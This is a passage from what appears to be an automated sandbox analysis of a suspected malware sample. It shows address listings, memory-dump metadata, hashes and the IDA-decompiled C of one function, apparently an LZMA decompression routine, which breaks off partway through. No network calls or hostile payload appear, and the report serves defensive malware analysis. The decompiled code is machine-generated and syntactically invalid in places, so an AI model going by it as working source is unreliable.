                                                    0x004070c9
                                                    0x00406826
                                                    0x00406836
                                                    0x00406839
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683f
                                                    0x00406843
                                                    0x00000000
                                                    0x00000000
                                                    0x00406845
                                                    0x0040684b
                                                    0x00406875
                                                    0x0040687b
                                                    0x00406882
                                                    0x00000000
                                                    0x00406882
                                                    0x00406851
                                                    0x00406854
                                                    0x00406859
                                                    0x00406859
                                                    0x00406864
                                                    0x0040686c
                                                    0x0040686f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004068b4
                                                    0x004068ba
                                                    0x004068bd
                                                    0x004068ca
                                                    0x004068d2
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00000000
                                                    0x00406889
                                                    0x00406889
                                                    0x0040688d
                                                    0x004070d8
                                                    0x00000000
                                                    0x004070d8
                                                    0x00406899
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a7
                                                    0x004068aa
                                                    0x004068ad
                                                    0x004068b2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f49
                                                    0x00406f49
                                                    0x00406f4f
                                                    0x00406f55
                                                    0x00406f5b
                                                    0x00406f75
                                                    0x00406f78
                                                    0x00406f7e
                                                    0x00406f89
                                                    0x00406f8b
                                                    0x00406f5d
                                                    0x00406f5d
                                                    0x00406f6c
                                                    0x00406f70
                                                    0x00406f70
                                                    0x00406f95
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004068da
                                                    0x004068dc
                                                    0x004068df
                                                    0x00406950
                                                    0x00406953
                                                    0x00406956
                                                    0x0040695d
                                                    0x00406967
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00406f46
                                                    0x004068e1
                                                    0x004068e5
                                                    0x004068e8
                                                    0x004068ea
                                                    0x004068ed
                                                    0x004068f0
                                                    0x004068f2
                                                    0x004068f5
                                                    0x004068f7
                                                    0x004068fc
                                                    0x004068ff
                                                    0x00406902
                                                    0x00406906
                                                    0x0040690d
                                                    0x00406910
                                                    0x00406917
                                                    0x0040691b
                                                    0x00406923
                                                    0x00406923
                                                    0x00406923
                                                    0x0040691d
                                                    0x0040691d
                                                    0x0040691d
                                                    0x00406912
                                                    0x00406912
                                                    0x00406912
                                                    0x00406927
                                                    0x0040692a
                                                    0x00406948
                                                    0x0040694a
                                                    0x00000000
                                                    0x0040692c
                                                    0x0040692c
                                                    0x0040692f
                                                    0x00406932
                                                    0x00406935
                                                    0x00406937
                                                    0x00406937
                                                    0x00406937
                                                    0x0040693a
                                                    0x0040693d
                                                    0x0040693f
                                                    0x00406940
                                                    0x00406943
                                                    0x00000000
                                                    0x00406943
                                                    0x00000000
                                                    0x00406b79
                                                    0x00406b7d
                                                    0x00406b9b
                                                    0x00406b9e
                                                    0x00406ba5
                                                    0x00406ba8
                                                    0x00406bab
                                                    0x00406bae
                                                    0x00406bb1
                                                    0x00406bb4
                                                    0x00406bb6
                                                    0x00406bbd
                                                    0x00406bbe
                                                    0x00406bc0
                                                    0x00406bc3
                                                    0x00406bc6
                                                    0x00406bc9
                                                    0x00406bc9
                                                    0x00406bce
                                                    0x00000000
                                                    0x00406bce
                                                    0x00406b7f
                                                    0x00406b82
                                                    0x00406b85
                                                    0x00406b8f
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406be3
                                                    0x00406be7
                                                    0x00406c0a
                                                    0x00406c0d
                                                    0x00406c10
                                                    0x00406c1a
                                                    0x00406be9
                                                    0x00406be9
                                                    0x00406bec
                                                    0x00406bef
                                                    0x00406bf2
                                                    0x00406bff
                                                    0x00406c02
                                                    0x00406c02
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406c26
                                                    0x00406c2a
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c30
                                                    0x00406c34
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c3a
                                                    0x00406c3c
                                                    0x00406c40
                                                    0x00406c40
                                                    0x00406c43
                                                    0x00406c47
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cbe
                                                    0x00406cc2
                                                    0x00406cc9
                                                    0x00406ccc
                                                    0x00406ccf
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cd2
                                                    0x00406cd5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d7e
                                                    0x00406d7e
                                                    0x00406d82
                                                    0x00407120
                                                    0x00000000
                                                    0x00407120
                                                    0x00406d88
                                                    0x00406d8b
                                                    0x00406d8e
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9b
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406da0
                                                    0x00406da3
                                                    0x00000000
                                                    0x00000000
                                                    0x00406973
                                                    0x00406973
                                                    0x00406977
                                                    0x004070e4
                                                    0x00000000
                                                    0x004070e4
                                                    0x0040697d
                                                    0x00406980
                                                    0x00406983
                                                    0x00406987
                                                    0x0040698a
                                                    0x00406990
                                                    0x00406992
                                                    0x00406992
                                                    0x00406992
                                                    0x00406995
                                                    0x00406998
                                                    0x00406998
                                                    0x0040699b
                                                    0x0040699e
                                                    0x00000000
                                                    0x00000000
                                                    0x004069a4
                                                    0x004069aa
                                                    0x00000000
                                                    0x00000000
                                                    0x004069b0
                                                    0x004069b0
                                                    0x004069b4
                                                    0x004069b7
                                                    0x004069ba
                                                    0x004069bd
                                                    0x004069c0
                                                    0x004069c1
                                                    0x004069c4
                                                    0x004069c6
                                                    0x004069cc
                                                    0x004069cf
                                                    0x004069d2
                                                    0x004069d5
                                                    0x004069d8
                                                    0x004069db
                                                    0x004069de
                                                    0x004069fa
                                                    0x004069fd
                                                    0x00406a00
                                                    0x00406a03
                                                    0x00406a0a
                                                    0x00406a0e
                                                    0x00406a10
                                                    0x00406a14
                                                    0x004069e0
                                                    0x004069e0
                                                    0x004069e4
                                                    0x004069ec
                                                    0x004069f1
                                                    0x004069f3
                                                    0x004069f5
                                                    0x004069f5
                                                    0x00406a17
                                                    0x00406a1e
                                                    0x00406a21
                                                    0x00000000
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a2c
                                                    0x00406a2c
                                                    0x00406a30
                                                    0x004070f0
                                                    0x00000000
                                                    0x004070f0
                                                    0x00406a36
                                                    0x00406a39
                                                    0x00406a3c
                                                    0x00406a40
                                                    0x00406a43
                                                    0x00406a49
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4e
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a57
                                                    0x00000000
                                                    0x00000000
                                                    0x00406a59
                                                    0x00406a5c
                                                    0x00406a5f
                                                    0x00406a62
                                                    0x00406a65
                                                    0x00406a68
                                                    0x00406a6b
                                                    0x00406a6e
                                                    0x00406a71
                                                    0x00406a74
                                                    0x00406a77
                                                    0x00406a8f
                                                    0x00406a92
                                                    0x00406a95
                                                    0x00406a98
                                                    0x00406a98
                                                    0x00406a9b
                                                    0x00406a9f
                                                    0x00406aa1
                                                    0x00406a79
                                                    0x00406a79
                                                    0x00406a81
                                                    0x00406a86
                                                    0x00406a88
                                                    0x00406a8a
                                                    0x00406a8a
                                                    0x00406aa4
                                                    0x00406aab
                                                    0x00406aae
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00406aae
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406af0
                                                    0x00406af0
                                                    0x00406af4
                                                    0x004070fc
                                                    0x00000000
                                                    0x004070fc
                                                    0x00406afa
                                                    0x00406afd
                                                    0x00406b00
                                                    0x00406b04
                                                    0x00406b07
                                                    0x00406b0d
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b12
                                                    0x00406b15
                                                    0x00406b15
                                                    0x00406b1b
                                                    0x00406ab9
                                                    0x00406ab9
                                                    0x00406abc
                                                    0x00000000
                                                    0x00406abc
                                                    0x00406b1d
                                                    0x00406b1d
                                                    0x00406b20
                                                    0x00406b23
                                                    0x00406b26
                                                    0x00406b29
                                                    0x00406b2c
                                                    0x00406b2f
                                                    0x00406b32
                                                    0x00406b35
                                                    0x00406b38
                                                    0x00406b3b
                                                    0x00406b53
                                                    0x00406b56
                                                    0x00406b59
                                                    0x00406b5c
                                                    0x00406b5c
                                                    0x00406b5f
                                                    0x00406b63
                                                    0x00406b65
                                                    0x00406b3d
                                                    0x00406b3d
                                                    0x00406b45
                                                    0x00406b4a
                                                    0x00406b4c
                                                    0x00406b4e
                                                    0x00406b4e
                                                    0x00406b68
                                                    0x00406b6f
                                                    0x00406b72
                                                    0x00000000
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406e01
                                                    0x00406e01
                                                    0x00406e05
                                                    0x0040712c
                                                    0x00000000
                                                    0x0040712c
                                                    0x00406e0b
                                                    0x00406e0e
                                                    0x00406e11
                                                    0x00406e15
                                                    0x00406e18
                                                    0x00406e1e
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f10
                                                    0x00406f14
                                                    0x00406f36
                                                    0x00406f39
                                                    0x00406f43
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f16
                                                    0x00406f19
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f20
                                                    0x00406f23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406fcd
                                                    0x00406fd1
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406ff6
                                                    0x00406ffd
                                                    0x00407004
                                                    0x00407004
                                                    0x00000000
                                                    0x00407004
                                                    0x00406fd3
                                                    0x00406fd6
                                                    0x00406fd9
                                                    0x00406fdc
                                                    0x00406fe3
                                                    0x00406f27
                                                    0x00406f27
                                                    0x00406f2a
                                                    0x00000000
                                                    0x00000000
                                                    0x004070be
                                                    0x004070c1
                                                    0x00406fc2
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cf8
                                                    0x00406cfa
                                                    0x00406d01
                                                    0x00406d02
                                                    0x00406d04
                                                    0x00406d07
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0f
                                                    0x00406d12
                                                    0x00406d15
                                                    0x00406d17
                                                    0x00406d19
                                                    0x00406d19
                                                    0x00406d1a
                                                    0x00406d1d
                                                    0x00406d24
                                                    0x00406d27
                                                    0x00406d35
                                                    0x00000000
                                                    0x00000000
                                                    0x0040700b
                                                    0x0040700b
                                                    0x0040700e
                                                    0x00407015
                                                    0x00000000
                                                    0x00000000
                                                    0x0040701a
                                                    0x0040701a
                                                    0x0040701e
                                                    0x00407156
                                                    0x00000000
                                                    0x00407156
                                                    0x00407024
                                                    0x00407027
                                                    0x0040702a
                                                    0x0040702e
                                                    0x00407031
                                                    0x00407037
                                                    0x00407039
                                                    0x00407039
                                                    0x00407039
                                                    0x0040703c
                                                    0x0040703f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x00407042
                                                    0x00407042
                                                    0x00407046
                                                    0x004070a6
                                                    0x004070a9
                                                    0x004070ae
                                                    0x004070af
                                                    0x004070b1
                                                    0x004070b3
                                                    0x004070b6
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00000000
                                                    0x00406fc8
                                                    0x00406fc2
                                                    0x00407048
                                                    0x0040704e
                                                    0x00407051
                                                    0x00407054
                                                    0x00407057
                                                    0x0040705a
                                                    0x0040705d
                                                    0x00407060
                                                    0x00407063
                                                    0x00407066
                                                    0x00407069
                                                    0x00407082
                                                    0x00407085
                                                    0x00407088
                                                    0x0040708b
                                                    0x0040708f
                                                    0x00407091
                                                    0x00407091
                                                    0x00407092
                                                    0x00407095
                                                    0x0040706b
                                                    0x0040706b
                                                    0x00407073
                                                    0x00407078
                                                    0x0040707a
                                                    0x0040707d
                                                    0x0040707d
                                                    0x00407098
                                                    0x0040709f
                                                    0x00000000
                                                    0x004070a1
                                                    0x00000000
                                                    0x004070a1
                                                    0x00000000
                                                    0x00406d3d
                                                    0x00406d40
                                                    0x00406d76
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea9
                                                    0x00406ea9
                                                    0x00406eac
                                                    0x00406eae
                                                    0x00407138
                                                    0x00000000
                                                    0x00407138
                                                    0x00406eb4
                                                    0x00406eb7
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ebd
                                                    0x00406ec1
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00000000
                                                    0x00406ec4
                                                    0x00406d42
                                                    0x00406d44
                                                    0x00406d46
                                                    0x00406d48
                                                    0x00406d4b
                                                    0x00406d4c
                                                    0x00406d4e
                                                    0x00406d50
                                                    0x00406d53
                                                    0x00406d56
                                                    0x00406d6c
                                                    0x00406d71
                                                    0x00406da9
                                                    0x00406da9
                                                    0x00406dad
                                                    0x00406dd9
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406de5
                                                    0x00406de8
                                                    0x00406de8
                                                    0x00406ded
                                                    0x00406ded
                                                    0x00406def
                                                    0x00406df2
                                                    0x00406df9
                                                    0x00406dfc
                                                    0x00406e29
                                                    0x00406e29
                                                    0x00406e2c
                                                    0x00406e2f
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00000000
                                                    0x00406ea3
                                                    0x00406e31
                                                    0x00406e37
                                                    0x00406e3a
                                                    0x00406e3d
                                                    0x00406e40
                                                    0x00406e43
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4c
                                                    0x00406e4f
                                                    0x00406e52
                                                    0x00406e6b
                                                    0x00406e6d
                                                    0x00406e70
                                                    0x00406e71
                                                    0x00406e74
                                                    0x00406e76
                                                    0x00406e79
                                                    0x00406e7b
                                                    0x00406e7d
                                                    0x00406e80
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e89
                                                    0x00406e8b
                                                    0x00406e8b
                                                    0x00406e8c
                                                    0x00406e8f
                                                    0x00406e92
                                                    0x00406e54
                                                    0x00406e54
                                                    0x00406e5c
                                                    0x00406e61
                                                    0x00406e63
                                                    0x00406e66
                                                    0x00406e66
                                                    0x00406e95
                                                    0x00406e9c
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00406e9c
                                                    0x00406daf
                                                    0x00406db2
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbd
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc5
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00406dc8
                                                    0x00406dcb
                                                    0x00406dd2
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00406dd2
                                                    0x00406d58
                                                    0x00406d5b
                                                    0x00406d5d
                                                    0x00406d60
                                                    0x00000000
                                                    0x00000000
                                                    0x00406abf
                                                    0x00406abf
                                                    0x00406ac3
                                                    0x00407108
                                                    0x00000000
                                                    0x00407108
                                                    0x00406ac9
                                                    0x00406acc
                                                    0x00406acf
                                                    0x00406ad2
                                                    0x00406ad5
                                                    0x00406ad8
                                                    0x00406adb
                                                    0x00406add
                                                    0x00406ae0
                                                    0x00406ae3
                                                    0x00406ae6
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c4a
                                                    0x00406c4a
                                                    0x00406c4e
                                                    0x00407114
                                                    0x00000000
                                                    0x00407114
                                                    0x00406c54
                                                    0x00406c57
                                                    0x00406c5a
                                                    0x00406c5d
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c62
                                                    0x00406c65
                                                    0x00406c68
                                                    0x00406c6b
                                                    0x00406c6e
                                                    0x00406c71
                                                    0x00406c72
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c77
                                                    0x00406c7a
                                                    0x00406c7d
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c83
                                                    0x00406c85
                                                    0x00406c85
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ecb
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ed1
                                                    0x00406ed4
                                                    0x00406ed7
                                                    0x00406eda
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edf
                                                    0x00406ee2
                                                    0x00406ee5
                                                    0x00406ee8
                                                    0x00406eeb
                                                    0x00406eee
                                                    0x00406eef
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef4
                                                    0x00406ef7
                                                    0x00406efa
                                                    0x00406efd
                                                    0x00406f00
                                                    0x00406f04
                                                    0x00406f06
                                                    0x00406f09
                                                    0x00000000
                                                    0x00406f0b
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406f09
                                                    0x0040713e
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d
                                                    0x00407175
                                                    0x00407175
                                                    0x00000000
                                                    0x00407175
                                                    0x00406fc2
                                                    0x00406f49
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406c9b

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
                                                    • Instruction ID: 9997fd61ac043c1521ccfeb60d91edfb3447ef4cf3d9eb85cab0c4916a58cc02
                                                    • Opcode Fuzzy Hash: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
                                                    • Instruction Fuzzy Hash: 5E714331D04229DBDF28CFA8C844BADBBB1FF44305F15806AD846BB290C7785996DF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406BE3 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E00406BE3() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
